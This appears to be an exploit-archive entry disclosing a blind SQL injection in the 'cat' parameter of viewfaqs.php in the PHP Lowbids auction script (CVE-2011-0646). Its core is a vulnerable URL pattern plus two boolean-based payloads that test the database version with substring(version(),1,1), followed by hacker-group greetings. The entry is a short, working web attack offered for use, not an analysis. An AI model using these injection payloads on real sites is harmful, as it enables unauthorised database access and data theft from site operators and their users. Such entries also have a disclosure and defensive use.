PHP Lowbids - 'viewfaqs.php' Blind SQL Injection
Author: h4ck3r
type: webapps
platform: php
port:
date_added: 2011-01-21
date_updated: 2011-01-21
verified: 1
codes: CVE-2011-0646;OSVDB-70594
tags:
aliases:
screenshot_url:
application_url:
==
[+]Script: PHP Lowbids
[+]Version: n/a
[+]Link: http://phplowbids.com
==
[+]Author: BorN To K!LL - h4ck3r
[+]Contact: SQL@hotmail.co.uk
==
[+]3xploit:
/viewfaqs.php?cat=[Blind-Injection]
[+]3xample:
/viewfaqs.php?cat=1 and substring(version(),1,1)=4 // true
/viewfaqs.php?cat=1 and substring(version(),1,1)=5 // false
==
[+]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==